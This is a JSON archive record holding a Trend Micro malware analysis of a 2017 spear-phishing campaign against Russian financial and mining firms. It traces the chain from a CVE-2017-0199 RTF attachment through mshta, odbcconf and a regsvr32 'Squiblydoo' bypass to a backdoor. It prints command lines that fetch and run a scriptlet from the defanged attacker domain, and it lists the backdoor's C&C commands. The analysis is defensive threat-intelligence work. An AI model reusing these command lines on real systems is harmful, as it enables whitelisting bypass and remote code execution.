{
	"id": "725e0241-f4c8-4dd8-9e48-f19d9912a2d7",
	"created_at": "2026-04-06T00:13:50.348304Z",
	"updated_at": "2026-04-10T03:20:26.996513Z",
	"deleted_at": null,
	"sha1_hash": "6aae288d5c47473975905db95d5dd02e0776c300",
	"title": "Emails with Backdoor Targets Russian Businesses",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86331,
	"plain_text": "Emails with Backdoor Targets Russian Businesses\r\nPublished: 2017-08-07 · Archived: 2026-04-05 19:24:59 UTC\r\nA malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and\r\nWindows components to deliver a new backdoor that allows attackers to take over the affected system. The attack\r\nabuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and\r\nblocking more challenging, particularly by whitelisting-based solutions.\r\nWe’ve observed at least five runs from June 23 to July 27, 2017, each of which sent several malicious emails per\r\ntarget. Affected industries were financial institutions, including banks, and mining firms. Of note is how the\r\nattackers diversified their tactic—sending different emails for each run, per target.\r\nThe earliest sample of the malicious dynamic-link library (DLL) file related to these attacks was uploaded to\r\nVirusTotal on June 6, 2017. This roughly coincides with the spate of emails we saw during the period between\r\nthe last week of June and July 27, 2017.\r\nWe're inclined to think that these attacks are still ongoing. Their limited distribution and specificity in social\r\nengineering lures are red flags that may indicate they are a spear-phishing campaign.\r\nFigure 1. The malicious email campaign’s attack chain\r\nFigure 2. Different malicious emails sent to one target (timeline from left to right, clockwise)\r\nFigure 3. A sample email sent to a mining firm\r\nThe infection chain starts with emails whose sender addresses are designed to make them look like they come from actual sales and\r\nbilling departments. One sample we found used the subject line Правила подключения к шлюзу, which translates\r\nto “Rules for connecting to the gateway.” Another has the subject line Оплата госпошлин, which\r\nmeans “Payment of state duties.”\r\nThese emails contain an attachment that takes the form of a .DOC file with various file names. Two of the file\r\nnames we’ve seen used are Инструкция для подключения клиентов.doc (Instructions for connecting\r\nclients) and Заявление на оплату услуги .doc (Application for payment of the service).\r\nFigure 4. Email with attached DOC file\r\nThese files are actually malformed Rich Text Format (RTF) files that Trend Micro detects as\r\nTROJ_EXPLOYT.JEJORC. They exploit a vulnerability (CVE-2017-0199) in Microsoft Office’s Windows\r\nObject Linking and Embedding (OLE) interface. We’ve seen other threat actors leveraging this security\r\nflaw as well.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/\r\nPage 1 of 4\n\nThe exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain,\r\nto which all of the URLs used by this attack point, is controlled by the attacker and was registered in early July.\r\nThis fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored\r\nand the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens\r\nHTA or HTML files.\r\nFigures 5 and 6. XLS file with header and JavaScript code\r\nThe JavaScript in m11.xls contains two PowerShell scripts. The first script will download and launch a decoy\r\ndocument, while the second will continue the infection chain by downloading another file.\r\nFigure 7. Decoy document from the first PowerShell script\r\nFigure 8. Content of newly downloaded file\r\nThe file will be decrypted using the AES-CBC cipher and then saved to the %AppData% folder with a\r\nrandom file name and .TXT extension. The decrypted file is a dynamic-link library (DLL) file detected as\r\nTROJ_DROPNAKJS.ZGEG-A.\r\nFigure 9. Decrypted file\r\nThe JavaScript code in m11.xls will then execute the file using the following command line: odbcconf.exe /S /A\r\n{REGSVR C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt}\r\nThis particular file (odbcconf.exe) is a normal executable that performs various tasks associated with Microsoft\r\nData Access Components. The command above misuses this feature to execute the DLL file.\r\nUpon execution, this DLL will drop a file in the %AppData% folder. This file is appended with a .txt extension.\r\nThis is actually an SCT file (Windows scriptlet), which is normally used to declare variables, define expressions,\r\nand add functional code in web pages. In this case, it contains a malicious, obfuscated JScript file (JS_NAKJS.ZIEG-A).\r\nFigure 10. Dropped XML file showing obfuscated downloader code\r\nThe DLL will execute the SCT file using the following command: regsvr32.exe /s /n /u\r\n/i:\"C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt\" scroBj.dll\r\nThis particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally\r\nused to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is\r\nalso known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts. It also means evading\r\napplication whitelisting protections such as AppLocker. While Squiblydoo is already a known attack vector, this is\r\nthe first time we’ve seen it combined with odbcconf.exe.\r\nThe above command, once deobfuscated, will execute another XML file, which is downloaded\r\nfrom hxxps://wecloud[.]biz/mail/changelog[.]txt. This file serves as the main backdoor.\r\nFigure 11. Constructing the command to launch the final payload\r\nThe same command format is used to launch the final payload (JS_GETFO.ZHEG-A). Note that because of the /i\r\nswitch, the code is gathered directly from a URL: regsvr32.exe /s /n /u /i:\r\nhxxps://wecloud[.]biz/mail/changelog[.]txt scroBj.dll\r\nThis is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially\r\nallow attackers to take over an infected system. It attempts to connect to its C\u0026C server\r\nat hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:\r\nd\u0026exec = download and execute PE file\r\ngtfo = delete files/startup entries and terminate\r\nmore_eggs = download additional/new scripts\r\nmore_onion = run new script and terminate current script\r\nmore_power = run command shell commands\r\nMitigation\r\nWhile the later stages of the infection chain require the use of various Windows components, the entry point still\r\ninvolves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users.\r\nAlternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL\r\ncategorization, as well as enforcing robust patch management policies, will significantly reduce the system’s\r\nattack surface.\r\nApart from enforcing the principle of least privilege, system administrators should also consider disabling system\r\ncomponents that aren’t necessary to the user’s tasks. Another option is to blacklist possible command interpreters\r\nand rarely used applications, even if they are Windows components themselves. It should be noted that doing this\r\ncould affect legitimate system functions, but will improve security.\r\nTrend Micro Solutions\r\nTrend Micro™ OfficeScan™ with XGen™ endpoint security has Vulnerability Protection that shields endpoints\r\nfrom identified and unknown vulnerability exploits even before patches are deployed. Trend Micro’s\r\nendpoint solutions such as Trend Micro™ Smart Protection Suites, and Worry-Free™ Business Security protect\r\nend users and businesses from these threats by detecting and blocking malicious files and all related malicious\r\nURLs.\r\nIndicators of Compromise (IoCs):\r\nRelated hashes detected as TROJ_EXPLOYT.JEJORC (SHA-256):\r\nRelated hash detected as TROJ_DROPNAKJS.ZGEG-A (SHA-256):\r\nMalicious DLLs detected as TROJ_DROPNAKJS.ZGEG-A (SHA-256):\r\nURLs related to the malicious email campaign:\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/"
	],
	"report_names": [
		"backdoor-carrying-emails-set-sights-on-russian-speaking-businesses"
	],
	"threat_actors": [],
	"ts_created_at": 1775434430,
	"ts_updated_at": 1775791226,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6aae288d5c47473975905db95d5dd02e0776c300.pdf",
		"text": "https://archive.orkl.eu/6aae288d5c47473975905db95d5dd02e0776c300.txt",
		"img": "https://archive.orkl.eu/6aae288d5c47473975905db95d5dd02e0776c300.jpg"
	}
}